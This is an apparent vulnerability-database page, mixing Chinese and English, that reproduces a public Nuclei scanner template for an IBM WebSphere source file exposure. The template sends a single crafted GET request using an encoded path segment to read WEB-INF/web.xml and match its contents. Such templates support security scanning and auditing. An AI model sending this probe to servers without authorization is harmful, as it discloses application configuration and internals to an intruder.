ibm-websphere-xml: IBM WebSphere Application - Source File Exposure

日期: 2025-08-01 | 影响软件: IBM WebSphere Application | POC: 已公开

漏洞描述

Disclose application specific files contained within the war file, including files under the web-inf and meta-inf directories.

PoC代码[已公开]

id: ibm-websphere-xml

info:
  name: IBM WebSphere Application - Source File Exposure
  author: r3nz0
  severity: medium
  description: |
    Disclose application specific files contained within the war file, including files under the web-inf and meta-inf directories.
  reference:
    - https://www.acunetix.com/vulnerabilities/web/ibm-websphere-weblogic-application-source-file-exposure/
  metadata:
    verified: true
    max-request: 1
  tags: ibm,websphere,exposure,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/iojs/%2e/WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</web-app>"
          - "<servlet>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022074a39d8f43438bc7d1d094d5b7654c6f06a4017d44b031c3017680bd8f56e0a2022100b705d4bc131f0765d38f2593e8116e249789b83919deac09f6b9d109527c3cb1:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/ibm-websphere-xml.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐